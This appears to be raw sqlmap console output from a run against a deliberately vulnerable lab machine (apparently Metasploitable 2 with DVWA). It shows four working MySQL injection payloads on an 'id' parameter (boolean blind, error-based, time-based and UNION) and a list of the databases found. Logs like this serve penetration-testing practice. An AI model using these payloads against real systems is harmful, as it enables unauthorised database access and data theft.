        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.4#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:48:06 /2026-03-22/

[08:48:06] [INFO] resuming back-end DBMS 'mysql' 
[08:48:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 3847=3847#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(5672,9598)>(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(5672=5672,1))),0x716a626271,FLOOR(RAND(0)*2))x FROM (SELECT 5262 UNION SELECT 1087 UNION SELECT 2883 UNION SELECT 6712)a GROUP BY x)-- RTrL&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2799 FROM (SELECT(SLEEP(5)))PKCd)-- UIdV&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7176787a71,0x714e63506a476150717366434c4a437445594f6c78536d41554e7169745a7356565a676662586b4d,0x716a626271),NULL#&Submit=Submit
---
[08:48:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 4.1
[08:48:06] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[08:48:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.6.129'
[08:48:06] [WARNING] your sqlmap version is outdated

[*] ending @ 08:48:06 /2026-03-22/

